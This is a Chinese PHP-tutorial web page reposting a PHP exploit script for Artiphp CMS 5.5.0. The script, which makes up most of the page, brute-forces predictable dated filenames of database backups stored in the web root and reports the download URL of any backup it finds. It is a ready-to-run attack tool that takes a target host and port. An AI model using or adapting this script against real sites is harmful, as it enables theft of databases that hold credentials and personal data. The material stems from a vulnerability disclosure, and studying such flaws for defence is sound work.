网站地图    收藏   

主页 > 后端 > 网站安全 >

Artiphp CMS 5.5.0数据库备份泄露Exploit - 网站安全

来源:自学PHP网    时间:2015-04-17 14:11 作者: 阅读:

[导读] ?php/*Artiphp CMS 5.5.0 Database Backup Disclosure Exploit作者: Artiphp www.2cto.com http://www.artiphp.com影响版本: 5.5.0 Neo (r422)Summary: Artiphp is a content management sys......

<?php
 
/*
 
Artiphp CMS 5.5.0 Database Backup Disclosure Exploit
 
 
作者: Artiphp www.2cto.com http://www.artiphp.com
影响版本: 5.5.0 Neo (r422)
 
Summary: Artiphp is a content management system (CMS) open
and free to create and manage your website.
 
描述: Artiphp stores database backups using backupDB() utility
with a predictable file name inside the web root, which can be
exploited to disclose sensitive information by downloading the
file. The backup is located in '/artzone/artpublic/database/'
directory as 'db_backup_[type].[yyyy-mm-dd].sql.gz' filename.
 
测试平台: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.21
           PHP 5.3.8 / 5.3.9
           MySQL 5.5.20
 
 
Gjoko 'LiquidWorm' Krstic @zeroscience发现的本漏洞
 
 
 
*/
 
error_reporting(0);
 
print "\no==========================================================o\n";
print "|                                                          |";
print "\n|\tArtiphp CMS 5.5.0 DB Backup Disclosure Exploit     |\n";
print "|                                                          |\n";
print "|\t\t\tby LiquidWorm                      |\n";
print "|                                                          |";
print "\no==========================================================o\n";
 
if ($argc < 3)
{
    print "\n\n\x20[*] Usage: php $argv[0] <host> <port>\n\n\n";
    die();
}
 
$godina_array = array('2012','2011','2010');
 
$mesec_array = array('12','11','10','09',
             '08','07','06','05',
             '04','03','02','01');
 
$dn_array = array('31','30','29','28','27','26',
          '25','24','23','22','21','20',
          '19','18','17','16','15','14',
          '13','12','11','10','09','08',
          '07','06','05','04','03','02',
          '01');
 
$backup_array = array('full','structure','partial');
 
$host = $argv[1];
$port = intval($argv[2]);
$path = "/artiphp/artzone/artpublic/database/"; // www.2cto.com change per need.
 
$alert1 = "\033[0;31m";
$alert2 = "\033[0;37m";
 
foreach($godina_array as $godina)
{
    print "\n\n\x20[*] Checking year: ".$godina."\n\n Scanning: ";
    sleep(2);
    foreach($mesec_array as $mesec)
    {
        foreach($dn_array as $dn)
        {
            print "~";
            foreach($backup_array as $backup)
            {
                if(file_get_contents("http://".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz"))
                {
                    print "\n\n\x20[!] DB backup file discovered!\n\n";
                    echo $alert1;
                    print "\x20==>\x20";
                    echo $alert2;
                    die("http://".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz\n");
                }
            }
        }
    }
}
 
print "\n\n\x20[*] Zero findings.\n\n\n"
 
?>

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论